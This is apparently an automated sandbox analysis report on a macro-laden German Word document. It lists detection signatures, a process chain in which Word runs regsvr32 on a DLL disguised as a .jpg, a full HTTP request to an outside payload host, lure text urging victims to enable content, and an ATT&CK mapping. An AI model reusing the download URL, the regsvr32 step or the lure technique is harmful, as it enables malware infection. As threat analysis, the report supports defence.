Loading ...

Play interactive tourEdit tour

Analysis Report Datei-04.28.2021.doc

Overview

General Information

Sample Name:Datei-04.28.2021.doc
Analysis ID:399362
MD5:6747583727ce069aa8ae9d398d35e5bc
SHA1:97667bf552bf5557666b5266003b0411bc1669bc
SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA with base64 encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • WINWORD.EXE (PID: 1692 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • regsvr32.exe (PID: 2544 cmdline: regsvr32 c:\programdata\argumentSelectTmp.jpg MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1692, ProcessCommandLine: regsvr32 c:\programdata\argumentSelectTmp.jpg, ProcessId: 2544

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Datei-04.28.2021.docVirustotal: Detection: 12%Perma Link
Machine Learning detection for sampleShow sources
Source: Datei-04.28.2021.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: better-transport-2008.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.142.215.160:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.142.215.160:80
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: better-transport-2008.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555D4EB4-8E09-401E-A760-1A1C7B299BE3}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: better-transport-2008.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: better-transport-2008.com
Source: vbaProject.binString found in binary or memory: http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/4
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000004.00000002.2092988316.0000000001CF0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2093880306.0000000003980000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2100384533.0000000004A07000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Inhalt aktivieren". a S nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8Screenshot OCR: Bearbeitung aktivieren' in der oberen Leiste und dann auf ,,Inhalt aktivieren". a S nmmm O
Source: Document image extraction number: 0Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 0Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Inhalt aktivieren".
Source: Document image extraction number: 1Screenshot OCR: Bearbeitung aktivieren" in der oberen Leiste und dann auf ,,Inhalt aktivieren".
Document contains an embedded VBA with base64 encoded stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module optionRemoveGeneric, Function memoryIndex, String ThisDocument
Source: Datei-04.28.2021.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module listCopy, Function autoopenName: autoopen
Source: Datei-04.28.2021.docOLE indicator, VBA macros: true
Source: Datei-04.28.2021.docOLE indicator has summary info: false
Source: Datei-04.28.2021.docOLE indicator application name: unknown
Source: regsvr32.exe, 00000004.00000002.2099295340.0000000004820000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.winDOC@4/12@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$tei-04.28.2021.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB23E.tmpJump to behavior
Source: Datei-04.28.2021.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Datei-04.28.2021.docVirustotal: Detection: 12%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 c:\programdata\argumentSelectTmp.jpgJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.2.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2844Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting12LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

